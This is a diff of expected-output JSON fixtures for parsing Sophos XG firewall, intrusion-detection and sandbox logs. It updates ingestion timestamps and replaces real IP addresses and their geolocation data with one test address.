"severity": 6, - "ingested": "2021-06-30T11:19:55.566469600Z", + "ingested": "2021-12-09T13:44:55.715564300Z", "original": "device=\"SFW\" date=2018-05-30 time=14:01:32 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.611\" out_interface=\"\" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol=\"UDP\" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010302602002", "kind": "event", @@ -6644,7 +6916,7 @@ "event": { "duration": 0, "severity": 4, - "ingested": "2021-06-30T11:19:55.566481Z", + "ingested": "2021-12-09T13:44:55.715571Z", "original": "device=\"SFW\" date=2018-05-30 time=14:17:17 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol=\"TCP\" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010402403001", "kind": "alert", @@ -6755,7 +7027,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566488600Z", + "ingested": "2021-12-09T13:44:55.715577Z", "original": "device=\"SFW\" date=2018-06-05 time=14:30:31 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010502604001 log_type=\"Firewall\" log_component=\"ICMP Redirection\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol=\"ICMP\" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010502604001", "kind": "event", @@ -6780,7 +7052,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -6790,23 +7062,25 @@ "port": 0 }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6846,7 +7120,7 @@ ], "ip": [ "10.198.12.19", - "8.8.8.8" + "175.16.199.1" ] }, "sophos": { @@ -6882,8 +7156,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566495800Z", - "original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", + "ingested": "2021-12-09T13:44:55.715583100Z", + "original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010602605001", "kind": "alert", "start": "2018-05-31T17:05:14.000Z", @@ -7002,7 +7276,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566503900Z", + "ingested": "2021-12-09T13:44:55.715589Z", "original": "device=\"SFW\" date=2018-05-30 time=15:09:51 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011702605051 log_type=\"Firewall\" log_component=\"MAC Filter\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.531\" out_interface=\"\" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol=\"UDP\" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011702605051", "kind": "event", @@ -7120,7 +7394,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566511300Z", + "ingested": "2021-12-09T13:44:55.715594900Z", "original": "device=\"SFW\" date=2018-06-01 time=10:57:55 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600006 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600006", "kind": "event", @@ -7144,7 +7418,7 @@ }, "bytes": 0, "packets": 0, - "ip": "72.163.4.185" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -7154,26 +7428,25 @@ "port": 0 }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "Richardson", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -96.7028, - "lat": 32.9473 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 109, + "number": 4837, "organization": { - "name": "Cisco Systems, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 0, "packets": 0, - "ip": "72.163.4.185" + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -7217,7 +7490,7 @@ ], "ip": [ "10.198.37.57", - "72.163.4.185" + "175.16.199.1" ] }, "sophos": { @@ -7256,8 +7529,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566518600Z", - "original": "device=\"SFW\" date=2018-06-01 time=10:55:41 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600003 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715600800Z", + "original": "device=\"SFW\" date=2018-06-01 time=10:55:41 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600003 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600003", "kind": "alert", "start": "2018-06-01T10:55:41.000Z", @@ -7277,14 +7550,31 @@ { "server": { "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "rule": { "name": "SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack", @@ -7293,22 +7583,24 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Romania", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 25.0, - "lat": 46.0 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "RO" + "country_iso_code": "CN" }, "as": { - "number": 28684, + "number": 4837, "organization": { - "name": "Bestnet Service SRL" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 41528, - "ip": "89.40.182.58" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -7331,8 +7623,7 @@ "testhost.local" ], "ip": [ - "89.40.182.58", - "172.16.68.20" + "175.16.199.1" ] }, "sophos": { @@ -7359,12 +7650,12 @@ }, "client": { "port": 41528, - "ip": "89.40.182.58" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566526Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", + "ingested": "2021-12-09T13:44:55.715606900Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", "action": "drop", @@ -7382,14 +7673,31 @@ { "server": { "port": 53, - "ip": "172.16.66.155" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 53, - "ip": "172.16.66.155" + "ip": "175.16.199.1" }, "rule": { "name": "PROTOCOL-DNS named version attempt", @@ -7399,23 +7707,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-SH", + "region_iso_code": "CN-JL", "country_name": "China", - "region_name": "Shanghai", + "region_name": "Jilin", "location": { - "lon": 121.4012, - "lat": 31.0449 + "lon": 125.3228, + "lat": 43.88 }, "country_iso_code": "CN" }, "as": { - "number": 4808, + "number": 4837, "organization": { - "name": "China Unicom Beijing Province Network" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 58914, - "ip": "117.50.11.192" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -7438,8 +7746,7 @@ "testhost.local" ], "ip": [ - "117.50.11.192", - "172.16.66.155" + "175.16.199.1" ] }, "sophos": { @@ -7466,12 +7773,12 @@ }, "client": { "port": 58914, - "ip": "117.50.11.192" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566532600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", + "ingested": "2021-12-09T13:44:55.715612800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", "code": "020804407002", "kind": "alert", "action": "drop", @@ -7489,14 +7796,31 @@ { "server": { "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 80, - "ip": "172.16.68.20" + "ip": "175.16.199.1" }, "rule": { "name": "SERVER-WEBAPP DrayTek multiple products command injection attempt", @@ -7505,22 +7829,24 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Netherlands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 4.8995, - "lat": 52.3824 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "NL" + "country_iso_code": "CN" }, "as": { - "number": 1136, + "number": 4837, "organization": { - "name": "KPN B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 59476, - "ip": "77.61.185.101" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -7543,8 +7869,7 @@ "defaulttest.local" ], "ip": [ - "77.61.185.101", - "172.16.68.20" + "175.16.199.1" ] }, "sophos": { @@ -7571,12 +7896,12 @@ }, "client": { "port": 59476, - "ip": "77.61.185.101" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566535900Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", + "ingested": "2021-12-09T13:44:55.715618700Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", "action": "drop", @@ -7665,7 +7990,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566541200Z", + "ingested": "2021-12-09T13:44:55.715625100Z", "original": "device=\"SFW\" date=2018-05-23 time=16:20:34 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020703406001 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Detect\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol=\"TCP\" src_port=28938 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020703406001", "kind": "alert", @@ -7755,7 +8080,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566546300Z", + "ingested": "2021-12-09T13:44:55.715631100Z", "original": "device=\"SFW\" date=2018-05-23 time=16:16:43 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020704406002 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Drop\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol=\"TCP\" src_port=40140 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020704406002", "kind": "alert", @@ -7813,7 +8138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566552500Z", + "ingested": "2021-12-09T13:44:55.715637200Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138301618041 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "138301618041", "kind": "event", @@ -7895,7 +8220,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566556300Z", + "ingested": "2021-12-09T13:44:55.715643Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138302218042 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith@iview.com\" src_ip=10.198.47.112 filename=\"1.exe\" filetype=\"application/octet-stream\" filesize=153006 sha1sum=\"83cd339302bf5e8ed5240ca6383418089c337a81\" source=\"jsmith@iview.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "138302218042", "kind": "alert", @@ -7953,7 +8278,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566561500Z", + "ingested": "2021-12-09T13:44:55.715648800Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=136501618041 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "136501618041", "kind": "event", @@ -8035,7 +8360,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566567Z", + "ingested": "2021-12-09T13:44:55.715729400Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136528618043 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Pending\" priority=Information user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"pending\" destination=\"\" subject=\"\"", "code": "136528618043", "kind": "event", @@ -8116,7 +8441,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566570800Z", + "ingested": "2021-12-09T13:44:55.715736400Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"cloud malicious\" destination=\"\" subject=\"", "code": "136502218042", "kind": "alert", @@ -8137,7 +8462,7 @@ "level": "critical" }, "source": { - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -8167,7 +8492,7 @@ "d910c4a81122c360fe57f67a04999425a65249db" ], "ip": [ - "172.16.34.24" + "175.16.199.1" ] }, "sophos": { @@ -8188,12 +8513,12 @@ "name": "defaulttest.local" }, "client": { - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566574700Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"\" src_ip=172.16.34.24 filename=\"SBTestFile1.pdf\" filetype=\"application/pdf\" filesize=1124 sha1sum=\"d910c4a81122c360fe57f67a04999425a65249db\" source=\"sophostest.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", + "ingested": "2021-12-09T13:44:55.715742800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"\" src_ip=175.16.199.1 filename=\"SBTestFile1.pdf\" filetype=\"application/pdf\" filesize=1124 sha1sum=\"d910c4a81122c360fe57f67a04999425a65249db\" source=\"sophostest.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "136502218042", "kind": "alert", "action": "Denied", @@ -8211,54 +8536,52 @@ { "server": { "bytes": 5669, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 401, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-22", - "city_name": "Gdynia", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Pomerania", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 18.5403, - "lat": 54.5055 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 6830, + "number": 4837, "organization": { - "name": "Liberty Global B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1419, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "url": { "full": "/mapi/nspi/" @@ -8281,8 +8604,7 @@ "testhost.local" ], "ip": [ - "89.68.140.204", - "185.8.209.207" + "175.16.199.1" ] }, "sophos": { @@ -8293,7 +8615,7 @@ "log_type": "WAF", "log_component": "Web Application Firewall", "cookie": 